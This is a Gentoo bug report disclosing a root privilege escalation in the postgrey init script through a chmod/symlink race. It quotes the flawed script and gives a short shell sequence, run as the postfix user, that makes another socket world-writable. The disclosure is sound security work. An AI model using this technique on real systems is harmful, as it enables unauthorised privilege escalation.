Gentoo Websites Logo
Go to: Gentoo Home Documentation Forums Lists Bugs Planet Store Wiki Get Gentoo!

Bug 603258

Summary: mail-filter/postgrey: root privilege escalation via init script race condition
Product: Gentoo Security Reporter: Michael Orlitzky <mjo>
Component: AuditingAssignee: Gentoo Security <security>
Status: CONFIRMED ---    
Severity: normal CC: andreis.vinogradovs, kfm, lists, net-mail+disabled, proxy-maint, sam
Priority: Normal    
Version: unspecified   
Hardware: All   
OS: Linux   
Package list:
Runtime testing required: ---

Description Michael Orlitzky gentoo-dev 2016-12-20 22:10:34 UTC
If you set POSTGREY_TYPE="unix" in the conf.d file for postgrey, then the socket it uses is located at,


However, that directory will be owned by the "postfix" user, and not by root. The init script for postgrey trusts the contents of that directory:

  # HACK -- start a subshell and corrects perms on the socket...
  if [ "x${POSTGREY_TYPE}" = "xunix" ]; then
      rm -f ${POSTGREY_SOCKET}
      ( while ! test -S ${POSTGREY_SOCKET}; \
          do sleep 1; \
        done; \
        chmod a+rw,a-x ${POSTGREY_SOCKET} ) &

It's not a big window, but there is one, between the "-S" test and the call to chmod that creates a race condition. The "postfix" user can replace the "postgrey" socket with a symlink to any file on the system, and the call to chmod will make the target of the symlink world-writable. I was able to exploit that by brute force (a while-loop that overwrites the postgrey socket with a symlink) but not reliably.

A more reliable attack is to create a symlink that points to another socket, so that the "-S" test succeeds and you don't need to time it just right. For example, as the postfix user in /var/spool/postfix/private,

  rm -f postgrey; \
  while [ ! -S postgrey ]; do : ; done; \
  ln -sf /var/run/ntpd.sock ./postgrey;

will (reliably) cause the init script to make your ntpd socket world-writable.
Comment 1 Michael Orlitzky gentoo-dev 2019-09-14 16:10:05 UTC
Coming up on a third birthday... is anyone still maintaining postgrey?
Comment 2 Robin Johnson archtester Gentoo Infrastructure gentoo-dev Security 2020-04-03 23:16:24 UTC
Unrestricting and reassigning to security@ per bug #705894
Comment 3 Robin Johnson archtester Gentoo Infrastructure gentoo-dev Security 2020-04-03 23:18:40 UTC
unrestricting per bug 705894
Comment 4 Sam James archtester Gentoo Infrastructure gentoo-dev Security 2020-05-21 22:43:37 UTC
@stefan, are you there? Any thoughts on this?
Comment 5 John Helmert III archtester Gentoo Infrastructure gentoo-dev Security 2021-01-05 21:43:12 UTC